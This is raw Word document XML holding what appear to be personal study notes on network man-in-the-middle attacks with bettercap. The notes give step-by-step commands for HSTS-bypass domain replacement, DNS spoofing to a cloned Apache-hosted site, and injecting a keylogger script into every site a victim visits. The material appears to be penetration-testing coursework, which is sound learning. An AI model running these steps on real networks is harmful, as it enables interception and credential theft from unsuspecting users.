    <w:p w14:paraId="7125564B" w14:textId="46571C9B" w:rsidR="00A1442C" w:rsidRDefault="00A1442C" w:rsidP="00A1442C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Find the caplet with HTTPS downgrade </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B64B983" w14:textId="64F33B8A" w:rsidR="00A1442C" w:rsidRDefault="00A1442C" w:rsidP="00A1442C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Set: set hstshijack.replacements to set twitter.corn for twitter.com or set facebook.corn to facebook.com and also set dns.spoof.domains to twitter.corn etc.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41FA0F2C" w14:textId="236C5878" w:rsidR="00A1442C" w:rsidRDefault="00A1442C" w:rsidP="00A1442C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Run the new downgrade caplet</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E8AB4F0" w14:textId="33E8F891" w:rsidR="00A1442C" w:rsidRDefault="00A1442C" w:rsidP="00A1442C">
      <w:r>
        <w:t>NOTE: for Chrome browser you need to disable secure DNS for this to work</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14154283" w14:textId="2E459DDA" w:rsidR="00A1442C" w:rsidRDefault="00A1442C" w:rsidP="00A1442C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:r>
        <w:t>DNS Spoofing</w:t>
      </w:r>
      <w:r w:rsidR="002277DF">
        <w:t xml:space="preserve"> (DOES NOT WORK ON HSTS DUE TO LOCALLY STORED DNS LIST)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11345823" w14:textId="4976A3FE" w:rsidR="00A1442C" w:rsidRDefault="00A1442C" w:rsidP="00A1442C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:r>
        <w:t>DNS converts domain names e.g google.com into the ip of the host server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="677E2FB9" w14:textId="0790D6C4" w:rsidR="001351D6" w:rsidRDefault="001351D6" w:rsidP="00A1442C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Can be used to </w:t>
      </w:r>
      <w:r w:rsidRPr="002277DF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>redirect</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> to another website using fake ip as a response.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A8BD865" w14:textId="41F98790" w:rsidR="001351D6" w:rsidRDefault="001351D6" w:rsidP="00A1442C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1CD2763B" w14:textId="24ADE946" w:rsidR="001351D6" w:rsidRDefault="001351D6" w:rsidP="00A1442C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:r>
        <w:t>Step 1: Determine what website to redirect to</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6490A70C" w14:textId="5621B6F3" w:rsidR="001351D6" w:rsidRDefault="001351D6" w:rsidP="001351D6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:r>
        <w:t>Step 2: use kali’s website server: server apache2 start</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6674784B" w14:textId="6355AF4C" w:rsidR="001351D6" w:rsidRDefault="001351D6" w:rsidP="001351D6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:r>
        <w:t>Step 3: go to /var/www/html to go to the files for the apache2 website</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6932DAA3" w14:textId="2301700E" w:rsidR="001351D6" w:rsidRDefault="001351D6" w:rsidP="001351D6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:r>
        <w:t>Step 4: you can edit the index.html with any website’s html using a notepad</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09349CEF" w14:textId="08DC8175" w:rsidR="001351D6" w:rsidRDefault="001351D6" w:rsidP="001351D6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:r>
        <w:t>Step 5: On bettercap type: help dns.spoof to see options</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E5F2785" w14:textId="37A27B68" w:rsidR="001351D6" w:rsidRDefault="001351D6" w:rsidP="001351D6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Step 6: If hosting on kali servers, do not change the dns.spoof.address option </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F7B82B0" w14:textId="066DFE73" w:rsidR="001351D6" w:rsidRDefault="001351D6" w:rsidP="001351D6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Step 7: set dns.spoof.all true (in order to respond to any dns request)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44C7310F" w14:textId="69579156" w:rsidR="001351D6" w:rsidRDefault="001351D6" w:rsidP="001351D6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:r>
        <w:t>Step 8: set dns.spoof.domain [the target domain to spoof e.g google.com</w:t>
      </w:r>
      <w:r w:rsidR="002277DF">
        <w:t xml:space="preserve"> or *.google.com (*target all domains)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">] </w:t>
      </w:r>
      <w:r w:rsidR="002277DF">
        <w:t>(can use more domains and separating them with commas (,))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F6F70E6" w14:textId="4179C7C9" w:rsidR="002277DF" w:rsidRDefault="002277DF" w:rsidP="001351D6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:r>
        <w:t>Step 9: dns.spoof on</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77F239AA" w14:textId="1F44C48F" w:rsidR="002277DF" w:rsidRDefault="002277DF" w:rsidP="001351D6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2C355B0C" w14:textId="23277DFB" w:rsidR="007A351F" w:rsidRDefault="007A351F" w:rsidP="001351D6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:r>
        <w:t>Injecting Javascript into caplet (works on all HTTP, HTTPS and HSTS)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D18D742" w14:textId="77777777" w:rsidR="007A351F" w:rsidRDefault="007A351F" w:rsidP="001351D6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="02FFD89E" w14:textId="6B493E39" w:rsidR="007A351F" w:rsidRDefault="007A351F" w:rsidP="001351D6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:r>
        <w:t>In payloads/keylogger.js add /payloads/keylogger.js, *:new.js</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73E5007F" w14:textId="7D06C6FB" w:rsidR="007A351F" w:rsidRDefault="007A351F" w:rsidP="001351D6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">This specifies that in any website (*) this js script should be ran also. * could be replaced with any website </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="080C7A62" w14:textId="61BFA3FE" w:rsidR="007A351F" w:rsidRDefault="007A351F" w:rsidP="001351D6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="264666B9" w14:textId="12EA358A" w:rsidR="007A351F" w:rsidRDefault="007A351F" w:rsidP="007A351F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:r>
        <w:t>Graphical interface of bettercap</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E14B0EC" w14:textId="19B37D67" w:rsidR="007A351F" w:rsidRDefault="007A351F" w:rsidP="007A351F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:r>
        <w:t>Step 1: start bettercap</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15DE999C" w14:textId="7D5DCFC8" w:rsidR="007A351F" w:rsidRDefault="007A351F" w:rsidP="007A351F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:r>
        <w:t>Step 2: download it : ui.update</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12F92CE9" w14:textId="691B21B1" w:rsidR="007A351F" w:rsidRDefault="007A351F" w:rsidP="007A351F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:r>
        <w:t>Step 3:http-ui</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50E86023" w14:textId="4309EEF8" w:rsidR="007A351F" w:rsidRDefault="007A351F" w:rsidP="007A351F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Step 4: </w:t>
      </w:r>
      <w:r w:rsidR="00CF354B">
        <w:t>copy url and open on web browser</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F216BB2" w14:textId="0C7536D8" w:rsidR="00CF354B" w:rsidRPr="00A1442C" w:rsidRDefault="00CF354B" w:rsidP="007A351F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:r>
        <w:t>Step 5: default username: user, password: pass</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21390DDB" w14:textId="612D3252" w:rsidR="00F51924" w:rsidRDefault="00F51924" w:rsidP="00F51924">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>Social Engineering</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4171FAD1" w14:textId="143755F1" w:rsidR="00F51924" w:rsidRPr="00F51924" w:rsidRDefault="00F51924" w:rsidP="00F51924"/>
    <w:sectPr w:rsidR="00F51924" w:rsidRPr="00F5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271"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="665A1D1E"/>
    <w:lvl w:ilvl="0" w:tplc="B0AC3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42FA"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="089A462E"/>
    <w:lvl w:ilvl="0" w:tplc="76B431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54C88"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="A7FA8ADE"/>
    <w:lvl w:ilvl="0" w:tplc="8BC23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5E7E"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="D76E3358"/>
    <w:lvl w:ilvl="0" w:tplc="5DBC56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02EE7"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="A6A69D6E"/>
    <w:lvl w:ilvl="0" w:tplc="3A6CAC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50708">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="890724903">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="914316722">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="4" w16cid:durableId="1318458734">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="5" w16cid:durableId="430276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020"/>
    <w:rsid w:val="001351D6"/>
    <w:rsid w:val="002277DF"/>
    <w:rsid w:val="00236E8B"/>
    <w:rsid w:val="002E5EC8"/>
    <w:rsid w:val="00321EEC"/>
    <w:rsid w:val="00377FB1"/>
    <w:rsid w:val="003E35C8"/>
    <w:rsid w:val="006879FC"/>
    <w:rsid w:val="00693442"/>
    <w:rsid w:val="007A351F"/>
    <w:rsid w:val="008B0BDC"/>
    <w:rsid w:val="009271BD"/>
    <w:rsid w:val="00A1442C"/>
    <w:rsid w:val="00A42826"/>
    <w:rsid w:val="00AD7020"/>
    <w:rsid w:val="00AE1E77"/>
    <w:rsid w:val="00AF3A6D"/>
    <w:rsid w:val="00BD6321"/>
    <w:rsid w:val="00C317E2"/>
    <w:rsid w:val="00CF354B"/>
    <w:rsid w:val="00F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8258"/>
  <w15:docId w15:val="{B633FB98-FEC6-4DEA-BB06-5D235EC8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35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Abbey</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Prince Abbey</cp:lastModifiedBy>
  <cp:revision>1</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2024-01-02T22:58:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-01-06T19:29:00Z</dcterms:modified>
</cp:coreProperties>
</file>